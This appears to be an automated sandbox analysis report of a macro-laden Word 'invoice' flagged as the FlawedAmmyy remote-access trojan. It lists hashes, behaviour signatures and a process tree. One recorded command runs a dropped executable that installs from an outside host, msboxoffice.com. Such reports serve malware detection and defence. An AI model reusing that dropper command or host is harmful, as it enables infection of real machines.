Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    16-09-2024 06:27

General

  • Target

    Invoice_ 69010.16_10.doc

  • Size

    77KB

  • MD5

    a8eda3039c4cbbb362eb5847ed38e37a

  • SHA1

    a1dca8f8ca13895aa9eb84456c7a2a92e1457e27

  • SHA256

    e006216019968c4bcdf3a7962842ed9200927f17578bcc45ea65e77955b6fd3f

  • SHA512

    9792974f387a872d04be16d35b9f2de407926000d0781c0dda569021e531fe0d57217a9bfb4d3cb60f2c038e24c4456a8c98ae1a8e5ffc019d776ed23d9e7ded

  • SSDEEP

    768:dD3bcTOAe/uqeX61y7PDqfgljPOs+jNWNA4H7dLuVXBk0KEzt6ePrMBfr:tsO5ucuqIljPOs+jH8VuVXBki8ezy

Malware Config

Signatures

  • FlawedAmmyy RAT

    Remote-access trojan based on leaked code for the Ammyy remote admin software.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Invoice_ 69010.16_10.doc"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2672
    • C:\Users\Admin\AppData\Local\Temp\pixie.exe
      "C:\Users\Admin\AppData\Local\Temp\pixie.exe" /norestart /q /i http://msboxoffice.com/tech
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2860
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2452
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2624

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      0db51653f95c259d464c1b803322f950

      SHA1

      16ad1b7682cbba1be02d183b7ad8808baf062be1

      SHA256

      44769c3a317014d72b112d235ecc2457933ac872bd21dfaa9282d5a4114c1a17

      SHA512

      87605bfbf768bfb6351b7093ea191f1b89eadf578a99d0c0db2e0973f93729bfccfbc530d1d563b95eabaaff2e375877554f52f495e55b3707781e2b06a1b7b1

    • \Users\Admin\AppData\Local\Temp\pixie.exe

      Filesize

      71KB

      MD5

      eee470f2a771fc0b543bdeef74fceca0

      SHA1

      bd9bbb448dec04b1aaa8ae530e9814fdbce0a3d5

      SHA256

      78617ddf9a0067a32cb5d87a796c93a9618ac006ccdcb3c7c824fdeb6ec5fd59

      SHA512

      9a89fef9c26e3dc98afdc61eea66e2b4a52843495b3433c21b5a55e744db42268e3d10587817b4c8adc7bfcc99065e0f3a7b6a7a05b1218ce7bba129d5a105e2

    • memory/2672-9-0x0000000000620000-0x0000000000720000-memory.dmp

      Filesize

      1024KB

    • memory/2672-12-0x0000000000620000-0x0000000000720000-memory.dmp

      Filesize

      1024KB

    • memory/2672-7-0x0000000000620000-0x0000000000720000-memory.dmp

      Filesize

      1024KB

    • memory/2672-6-0x0000000000620000-0x0000000000720000-memory.dmp

      Filesize

      1024KB

    • memory/2672-8-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

      Filesize

      1024KB

    • memory/2672-15-0x0000000000620000-0x0000000000720000-memory.dmp

      Filesize

      1024KB

    • memory/2672-11-0x0000000000620000-0x0000000000720000-memory.dmp

      Filesize

      1024KB

    • memory/2672-10-0x0000000000620000-0x0000000000720000-memory.dmp

      Filesize

      1024KB

    • memory/2672-0-0x000000002FC41000-0x000000002FC42000-memory.dmp

      Filesize

      4KB

    • memory/2672-5-0x0000000000620000-0x0000000000720000-memory.dmp

      Filesize

      1024KB

    • memory/2672-2-0x000000007163D000-0x0000000071648000-memory.dmp

      Filesize

      44KB

    • memory/2672-26-0x000000007163D000-0x0000000071648000-memory.dmp

      Filesize

      44KB

    • memory/2672-27-0x0000000000620000-0x0000000000720000-memory.dmp

      Filesize

      1024KB

    • memory/2672-28-0x0000000000620000-0x0000000000720000-memory.dmp

      Filesize

      1024KB

    • memory/2672-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2672-45-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2672-46-0x000000007163D000-0x0000000071648000-memory.dmp

      Filesize

      44KB

    • memory/2672-47-0x0000000000620000-0x0000000000720000-memory.dmp

      Filesize

      1024KB